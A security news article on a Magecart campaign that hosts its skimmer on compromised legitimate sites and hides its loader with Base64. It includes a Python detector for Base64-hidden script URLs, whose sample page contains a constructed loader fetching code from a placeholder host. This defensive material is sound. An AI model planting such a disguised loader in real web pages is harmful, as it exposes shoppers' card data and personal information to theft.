
Cybercriminals Exploit Legitimate Websites for Credit Card Theft

Security researchers have uncovered a new Magecart campaign that steals PII and credit card data from e-commerce websites. Akamai has identified victims of varying sizes across North America, Latin America, and Europe.

What sets this campaign apart is that the threat actors host their C2 infrastructure on otherwise legitimate websites, which they typically compromise by exploiting well-known vulnerabilities.

Diving into details

In the initial phase of their operation, the attackers identify vulnerable legitimate websites, which they then hack into. These compromised websites serve as their C2 servers.
  • By leveraging reputable websites, the threat actors cleverly avoid detection and circumvent blocks, eliminating the need to establish their own infrastructure.
  • Subsequently, the attackers proceed to inject a concise JavaScript snippet into their targeted e-commerce sites. This snippet retrieves the malicious code from the previously compromised websites.

Encoding for stealthiness

  • To make the attack harder to spot, the threat actors use Base64 encoding to obfuscate the credit card skimmer.
  • The encoding conceals the URL of the host that serves the skimmer, and the loader is structured to resemble well-known third-party services such as Google Tag Manager or Facebook Pixel.
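As an added example (not code from the article or from Akamai's research), the Python check below combines the two points above, a short loader that fetches the skimmer from a compromised host and a Base64-encoded host URL: it scans a page's inline scripts for Base64 literals that decode to a script URL whose host is not on an allowlist of expected tag vendors. The allowlist, the sample page and the hostname in it are constructed assumptions, not indicators from the campaign.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Hosts this site is known to load tags from (an assumed allowlist; tune it per site).
KNOWN_TAG_HOSTS = {"www.googletagmanager.com", "connect.facebook.net"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Quoted literals long enough to hold a URL and made only of Base64 characters.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")

def decode_if_url(literal):
    """Return the decoded text if the literal is Base64 for an http(s) or protocol-relative URL, else None."""
    try:
        decoded = base64.b64decode(literal, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if re.match(r"^(https?:)?//", decoded) else None

def find_encoded_loaders(html):
    """Scan inline scripts for Base64-hidden script URLs; return (decoded_url, host) for hosts off the allowlist."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        for literal in B64_LITERAL_RE.findall(script):
            url = decode_if_url(literal)
            if url is None:
                continue
            host = urlparse(url if "://" in url else "https:" + url).hostname
            if host not in KNOWN_TAG_HOSTS:
                findings.append((url, host))
    return findings

# Constructed sample page: a genuine-looking GTM loader, then a loader that hides its host in Base64.
HIDDEN_HOST_URL = "https://compromised-example.com/gtm.js"  # placeholder host, not a real indicator
SAMPLE_HTML = """
<script>
(function(w,d,s,l,i){var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXX');
</script>
<script>
var s=document.createElement('script');
s.src=atob('%s');document.head.appendChild(s);
</script>
""" % base64.b64encode(HIDDEN_HOST_URL.encode()).decode()

if __name__ == "__main__":
    for url, host in find_encoded_loaders(SAMPLE_HTML):
        print("Base64-hidden loader:", url, "-> host", host)
```

The legitimate GTM loader passes because its URL is in clear text and on the allowlist; only the literal that decodes to an unexpected host is reported.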

Why this matters

  • The campaign primarily targets commerce organizations, and its scale is significant: some victim organizations receive hundreds of thousands of visitors per month.
  • Consequently, thousands, and potentially tens of thousands, of individuals are at risk of having their credit card data and PII stolen.
  • Web skimming attacks cause substantial harm to digital commerce organizations, including reputational damage and other adverse consequences.

Attacks get worse

  • It's worth noting that numerous high-profile Magecart attacks go undetected for months, or even years.
  • In 2022 alone, out of 9,290 digital commerce domains affected by Magecart attacks, a staggering 2,468 remained actively infected until the year's end, underscoring the formidable threat posed to commerce organizations.

The bottom line

This campaign is a reminder that web skimming remains a persistent security threat. Malicious actors constantly adapt their tactics to obfuscate their activity and make detection harder. Traditional static analysis tools fall short against web skimmers, because threat actors continuously modify their approaches and employ increasingly sophisticated techniques that evade static analysis.
Cyware Publisher